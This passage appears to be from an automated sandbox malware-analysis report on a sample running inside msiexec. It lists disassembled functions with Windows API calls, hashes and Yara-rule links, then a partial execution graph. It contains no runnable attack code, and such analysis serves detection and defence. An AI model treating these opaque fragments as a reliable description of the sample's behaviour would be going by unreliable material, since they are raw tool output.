                                                                                                        • String ID: _lng.ini
                                                                                                        • API String ID: 383090722-1948609170
                                                                                                        • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                        • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                        • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                        • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                        Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                        • API String ID: 2773794195-880857682
                                                                                                        • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                        • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                        • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                        • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                        Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                        • memset.MSVCRT ref: 0042BAAE
                                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 438689982-0
                                                                                                        • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                        • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                        Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1860491036-0
                                                                                                        • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                        • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                        Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcslen.MSVCRT ref: 0040A8E2
                                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                        • free.MSVCRT ref: 0040A908
                                                                                                        • free.MSVCRT ref: 0040A92B
                                                                                                        • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 726966127-0
                                                                                                        • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                        • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                        Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcslen.MSVCRT ref: 0040B1DE
                                                                                                        • free.MSVCRT ref: 0040B201
                                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                        • free.MSVCRT ref: 0040B224
                                                                                                        • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 726966127-0
                                                                                                        • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                        • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                        Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                          • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                        • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 231171946-0
                                                                                                        • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                        • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                        • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                        • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                        Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.MSVCRT ref: 0040B0D8
                                                                                                        • free.MSVCRT ref: 0040B0FB
                                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                        • free.MSVCRT ref: 0040B12C
                                                                                                        • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3669619086-0
                                                                                                        • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                        • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                        Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1033339047-0
                                                                                                        • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                        • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                        Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                        • malloc.MSVCRT ref: 00417407
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                        • free.MSVCRT ref: 00417425
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2605342592-0
                                                                                                        • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                        • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                        Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcslen$wcscat$wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1961120804-0
                                                                                                        • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                        • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                        • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                        • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.1%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0.5%
                                                                                                        Total number of Nodes:762
                                                                                                        Total number of Limit Nodes:20
                                                                                                        execution_graph 34007 40fc40 70 API calls 34182 403640 21 API calls 34008 427fa4 42 API calls 34183 412e43 _endthreadex 34184 425115 76 API calls __fprintf_l 34185 43fe40 133 API calls 34011 425115 83 API calls __fprintf_l 34012 401445 memcpy memcpy DialogBoxParamA 34013 440c40 34 API calls 33228 444c4a 33247 444e38 33228->33247 33230 444c56 GetModuleHandleA 33231 444c68 __set_app_type __p__fmode __p__commode 33230->33231 33233 444cfa 33231->33233 33234 444d02 __setusermatherr 33233->33234 33235 444d0e 33233->33235 33234->33235 33248 444e22 _controlfp 33235->33248 33237 444d13 _initterm __getmainargs _initterm 33238 444d6a GetStartupInfoA 33237->33238 33240 444d9e GetModuleHandleA 33238->33240 33249 40cf44 33240->33249 33244 444dcf _cexit 33246 444e04 33244->33246 33245 444dc8 exit 33245->33244 33247->33230 33248->33237 33300 404a99 LoadLibraryA 33249->33300 33251 40cf64 33251->33244 33251->33245 33252 40cf60 33252->33251 33308 410d0e 33252->33308 33254 40cf6f 33312 40ccd7 ??2@YAPAXI 33254->33312 33256 40cf9b 33326 407cbc 33256->33326 33261 40cfc4 33345 409825 memset 33261->33345 33262 40cfd8 33350 4096f4 memset 33262->33350 33267 40d181 ??3@YAXPAX 33269 40d1b3 33267->33269 33270 40d19f DeleteObject 33267->33270 33268 407e30 _strcmpi 33271 40cfee 33268->33271 33374 407948 free free 33269->33374 33270->33269 33273 40cff2 RegDeleteKeyA 33271->33273 33274 40d007 EnumResourceTypesA 33271->33274 33273->33267 33276 40d047 33274->33276 33277 40d02f MessageBoxA 33274->33277 33275 40d1c4 33375 4080d4 free 33275->33375 33278 40d0a0 CoInitialize 33276->33278 33355 40ce70 33276->33355 33277->33267 33372 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33372 33282 40d1cd 33376 407948 free free 33282->33376 33284 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33373 40c256 PostMessageA 33284->33373 33286 40d061 ??3@YAXPAX 33286->33269 33289 40d084 DeleteObject 33286->33289 33287 40d09e 33287->33278 33289->33269 33292 40d0f9 GetMessageA 33293 40d17b CoUninitialize 33292->33293 33294 40d10d 33292->33294 33293->33267 33295 40d113 TranslateAccelerator 33294->33295 33297 40d145 IsDialogMessage 33294->33297 33298 40d139 IsDialogMessage 33294->33298 33295->33294 33296 40d16d GetMessageA 33295->33296 33296->33293 33296->33295 33297->33296 33299 40d157 TranslateMessage DispatchMessageA 33297->33299 33298->33296 33298->33297 33299->33296 33301 404ac4 GetProcAddress 33300->33301 33302 404aec 33300->33302 33303 404add FreeLibrary 33301->33303 33305 404ad4 33301->33305 33306 404b13 33302->33306 33307 404afc MessageBoxA 33302->33307 33303->33302 33304 404ae8 33303->33304 33304->33302 33305->33303 33306->33252 33307->33252 33309 410d17 LoadLibraryA 33308->33309 33310 410d3c 33308->33310 33309->33310 33311 410d2b GetProcAddress 33309->33311 33310->33254 33311->33310 33313 40cd08 ??2@YAPAXI 33312->33313 33315 40cd26 33313->33315 33317 40cd2d 33313->33317 33384 404025 6 API calls 33315->33384 33318 40cd66 33317->33318 33319 40cd59 DeleteObject 33317->33319 33377 407088 33318->33377 33319->33318 33321 40cd6b 33380 4019b5 33321->33380 33324 4019b5 strncat 33325 40cdbf _mbscpy 33324->33325 33325->33256 33386 407948 free free 33326->33386 33328 407e04 33387 407a55 33328->33387 33331 407a1f malloc memcpy free free 33333 407cf7 33331->33333 33332 407ddc 33332->33328 33392 407a1f 33332->33392 33333->33328 33333->33331 33333->33332 33335 407d83 33333->33335 33336 407d7a free 33333->33336 33390 40796e 7 API calls 33333->33390 33335->33333 33391 406f30 malloc memcpy free 33335->33391 33336->33333 33341 407e30 33342 407e38 33341->33342 33344 407e57 33341->33344 33343 407e41 _strcmpi 33342->33343 33342->33344 33343->33342 33343->33344 33344->33261 33344->33262 33400 4097ff 33345->33400 33347 409854 33405 409731 33347->33405 33351 4097ff 3 API calls 33350->33351 33352 409723 33351->33352 33425 40966c 33352->33425 33439 4023b2 33355->33439 33361 40ced3 33523 40cdda 7 API calls 33361->33523 33362 40cece 33365 40cf3f 33362->33365 33476 40c3d0 memset GetModuleFileNameA strrchr 33362->33476 33365->33286 33365->33287 33368 40ceed 33502 40affa 33368->33502 33372->33284 33373->33292 33374->33275 33375->33282 33376->33251 33385 406fc7 memset _mbscpy 33377->33385 33379 40709f CreateFontIndirectA 33379->33321 33381 4019e1 33380->33381 33382 4019c2 strncat 33381->33382 33383 4019e5 memset LoadIconA 33381->33383 33382->33381 33383->33324 33384->33317 33385->33379 33386->33333 33388 407a65 33387->33388 33389 407a5b free 33387->33389 33388->33341 33389->33388 33390->33333 33391->33335 33393 407a38 33392->33393 33394 407a2d free 33392->33394 33399 406f30 malloc memcpy free 33393->33399 33396 407a44 33394->33396 33398 40796e 7 API calls 33396->33398 33397 407a43 33397->33396 33398->33328 33399->33397 33416 406f96 GetModuleFileNameA 33400->33416 33402 409805 strrchr 33403 409814 33402->33403 33404 409817 _mbscat 33402->33404 33403->33404 33404->33347 33417 44b090 33405->33417 33410 40930c 3 API calls 33411 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33410->33411 33412 4097c5 LoadStringA 33411->33412 33413 4097db 33412->33413 33413->33412 33414 4097f3 33413->33414 33424 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33413->33424 33414->33267 33416->33402 33418 40973e _mbscpy _mbscpy 33417->33418 33419 40930c 33418->33419 33420 44b090 33419->33420 33421 409319 memset GetPrivateProfileStringA 33420->33421 33422 409374 33421->33422 33423 409364 WritePrivateProfileStringA 33421->33423 33422->33410 33423->33422 33424->33413 33435 406f81 GetFileAttributesA 33425->33435 33427 409675 33428 4096ee 33427->33428 33429 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33427->33429 33428->33268 33436 409278 GetPrivateProfileStringA 33429->33436 33431 4096c9 33437 409278 GetPrivateProfileStringA 33431->33437 33433 4096da 33438 409278 GetPrivateProfileStringA 33433->33438 33435->33427 33436->33431 33437->33433 33438->33428 33525 409c1c 33439->33525 33442 401e69 memset 33564 410dbb 33442->33564 33445 401ec2 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33445->33588 33446 401ed4 33577 406f81 GetFileAttributesA 33446->33577 33449 401ee6 strlen strlen 33451 401f15 33449->33451 33452 401f28 33449->33452 33589 4070e3 strlen _mbscat _mbscpy _mbscat 33451->33589 33578 406f81 GetFileAttributesA 33452->33578 33455 401f35 33579 401c31 33455->33579 33458 401f75 33460 402165 33458->33460 33461 401f9c memset 33458->33461 33459 401c31 5 API calls 33459->33458 33463 402195 ExpandEnvironmentStringsA 33460->33463 33464 4021a8 _strcmpi 33460->33464 33590 410b62 RegEnumKeyExA 33461->33590 33596 406f81 GetFileAttributesA 33463->33596 33464->33361 33464->33362 33465 401fc9 33465->33460 33467 401fd9 atoi 33465->33467 33471 402076 memset memset strlen strlen 33465->33471 33472 4070e3 strlen _mbscat _mbscpy _mbscat 33465->33472 33473 4020dd strlen strlen 33465->33473 33474 406f81 GetFileAttributesA 33465->33474 33475 402167 _mbscpy 33465->33475 33595 410b62 RegEnumKeyExA 33465->33595 33467->33465 33468 401fef memset memset sprintf 33467->33468 33591 410b1e 33468->33591 33471->33465 33472->33465 33473->33465 33474->33465 33475->33460 33477 40c422 33476->33477 33478 40c425 _mbscat _mbscpy _mbscpy 33476->33478 33477->33478 33479 40c49d 33478->33479 33480 40c512 33479->33480 33481 40c502 GetWindowPlacement 33479->33481 33482 40c538 33480->33482 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33480->33614 33481->33480 33607 409b31 33482->33607 33486 40ba28 33487 40ba87 33486->33487 33493 40ba3c 33486->33493 33617 406c62 LoadCursorA SetCursor 33487->33617 33489 40ba8c 33618 403c16 33489->33618 33684 4107f1 33489->33684 33687 404734 33489->33687 33695 404785 33489->33695 33490 40ba43 _mbsicmp 33490->33493 33491 40baa0 33492 407e30 _strcmpi 33491->33492 33496 40bab0 33492->33496 33493->33487 33493->33490 33698 40b5e5 10 API calls 33493->33698 33494 40bafa SetCursor 33494->33368 33496->33494 33497 40baf1 qsort 33496->33497 33497->33494 33991 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33502->33991 33504 40b00e 33505 40b016 33504->33505 33506 40b01f GetStdHandle 33504->33506 33992 406d1a CreateFileA 33505->33992 33508 40b01c 33506->33508 33509 40b035 33508->33509 33510 40b12d 33508->33510 33993 406c62 LoadCursorA SetCursor 33509->33993 33997 406d77 9 API calls 33510->33997 33513 40b136 33524 40c580 28 API calls 33513->33524 33514 40b042 33515 40b087 33514->33515 33521 40b0a1 33514->33521 33994 40a57c strlen WriteFile 33514->33994 33515->33521 33995 40a699 12 API calls 33515->33995 33518 40b0d6 33519 40b116 CloseHandle 33518->33519 33520 40b11f SetCursor 33518->33520 33519->33520 33520->33513 33521->33518 33996 406d77 9 API calls 33521->33996 33523->33362 33524->33365 33537 409a32 33525->33537 33528 409c80 memcpy memcpy 33529 409cda 33528->33529 33529->33528 33530 408db6 12 API calls 33529->33530 33531 409d18 ??2@YAPAXI ??2@YAPAXI 33529->33531 33530->33529 33532 409d54 ??2@YAPAXI 33531->33532 33535 409d8b 33531->33535 33532->33535 33547 409b9c 33535->33547 33536 4023c1 33536->33442 33538 409a44 33537->33538 33539 409a3d ??3@YAXPAX 33537->33539 33540 409a52 33538->33540 33541 409a4b ??3@YAXPAX 33538->33541 33539->33538 33542 409a63 33540->33542 33543 409a5c ??3@YAXPAX 33540->33543 33541->33540 33544 409a83 ??2@YAPAXI ??2@YAPAXI 33542->33544 33545 409a73 ??3@YAXPAX 33542->33545 33546 409a7c ??3@YAXPAX 33542->33546 33543->33542 33544->33528 33545->33546 33546->33544 33548 407a55 free 33547->33548 33549 409ba5 33548->33549 33550 407a55 free 33549->33550 33551 409bad 33550->33551 33552 407a55 free 33551->33552 33553 409bb5 33552->33553 33554 407a55 free 33553->33554 33555 409bbd 33554->33555 33556 407a1f 4 API calls 33555->33556 33557 409bd0 33556->33557 33558 407a1f 4 API calls 33557->33558 33559 409bda 33558->33559 33560 407a1f 4 API calls 33559->33560 33561 409be4 33560->33561 33562 407a1f 4 API calls 33561->33562 33563 409bee 33562->33563 33563->33536 33565 410d0e 2 API calls 33564->33565 33566 410dca 33565->33566 33567 410dfd memset 33566->33567 33597 4070ae 33566->33597 33570 410e1d 33567->33570 33571 410e7f _mbscpy 33570->33571 33600 410d3d _mbscpy 33570->33600 33573 401e9e strlen strlen 33571->33573 33573->33445 33573->33446 33574 410e5b 33601 410add RegQueryValueExA 33574->33601 33576 410e73 33576->33571 33577->33449 33578->33455 33580 401c4c 33579->33580 33587 401ca1 33580->33587 33602 410add RegQueryValueExA 33580->33602 33582 401c6a 33583 401c71 strchr 33582->33583 33582->33587 33584 401c85 strchr 33583->33584 33583->33587 33585 401c94 33584->33585 33584->33587 33603 406f06 strlen 33585->33603 33587->33458 33587->33459 33588->33446 33589->33452 33590->33465 33592 410b34 33591->33592 33593 410b4c 33592->33593 33606 410add RegQueryValueExA 33592->33606 33593->33465 33595->33465 33596->33464 33598 4070bd GetVersionExA 33597->33598 33599 4070ce 33597->33599 33598->33599 33599->33567 33599->33573 33600->33574 33601->33576 33602->33582 33604 406f17 33603->33604 33605 406f1a memcpy 33603->33605 33604->33605 33605->33587 33606->33593 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33486 33616 409868 SendMessageA 33612->33616 33614->33482 33615->33610 33616->33611 33617->33489 33619 4107f1 FreeLibrary 33618->33619 33620 403c30 LoadLibraryA 33619->33620 33621 403c74 33620->33621 33622 403c44 GetProcAddress 33620->33622 33623 4107f1 FreeLibrary 33621->33623 33622->33621 33624 403c5e 33622->33624 33625 403c7b 33623->33625 33624->33621 33628 403c6b 33624->33628 33626 404734 3 API calls 33625->33626 33627 403c86 33626->33627 33699 4036e5 33627->33699 33628->33625 33631 4036e5 27 API calls 33632 403c9a 33631->33632 33633 4036e5 27 API calls 33632->33633 33634 403ca4 33633->33634 33635 4036e5 27 API calls 33634->33635 33636 403cae 33635->33636 33711 4085d2 33636->33711 33642 403cd2 33644 403cf7 33642->33644 33863 402bd1 37 API calls 33642->33863 33645 403d1c 33644->33645 33864 402bd1 37 API calls 33644->33864 33746 402c5d 33645->33746 33649 4070ae GetVersionExA 33650 403d31 33649->33650 33652 403d61 33650->33652 33865 402b22 42 API calls 33650->33865 33654 403d97 33652->33654 33866 402b22 42 API calls 33652->33866 33655 403dcd 33654->33655 33867 402b22 42 API calls 33654->33867 33758 410808 33655->33758 33659 404785 FreeLibrary 33660 403de8 33659->33660 33762 402fdb 33660->33762 33663 402fdb 29 API calls 33664 403e00 33663->33664 33774 4032b7 33664->33774 33673 403e3b 33675 403e73 33673->33675 